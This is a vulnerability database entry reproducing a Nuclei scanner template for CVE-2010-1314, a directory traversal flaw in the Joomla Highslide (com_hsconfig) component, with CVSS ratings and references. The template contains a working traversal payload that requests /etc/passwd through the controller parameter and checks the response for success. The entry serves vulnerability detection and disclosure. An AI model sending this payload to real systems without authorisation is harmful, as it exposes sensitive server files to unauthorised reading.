Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-1314
HistoryAug 23, 2021 - 12:23 a.m.

Joomla! Component Highslide 1.5 - Local File Inclusion

2021-08-2300:23:19
ProjectDiscovery
github.com
7
joomla
highslide
directory traversal
remote attackers
arbitrary files
unauthorized access
sensitive files
com_hsconfig

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

5.6

Confidence

High

EPSS

0.005

Percentile

75.9%

A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-1314

info:
  name: Joomla! Component Highslide 1.5 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/12086
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1314
    - http://packetstormsecurity.org/1004-exploits/joomlahsconfig-lfi.txt
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2010-1314
    cwe-id: CWE-22
    epss-score: 0.00477
    epss-percentile: 0.75733
    cpe: cpe:2.3:a:joomlanook:com_hsconfig:1.5:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: joomlanook
    product: com_hsconfig
  tags: cve,cve2010,lfi,edb,packetstorm,joomla,joomlanook

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402207954ede2855432fd8a3e30891c30a1cf6213ba79e7d31905a775dd785c39553502203d862e5de7fc09c113afcf3796b211723a67c327466be378b9db7b34c333c531:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

5.6

Confidence

High

EPSS

0.005

Percentile

75.9%

Related for NUCLEI:CVE-2010-1314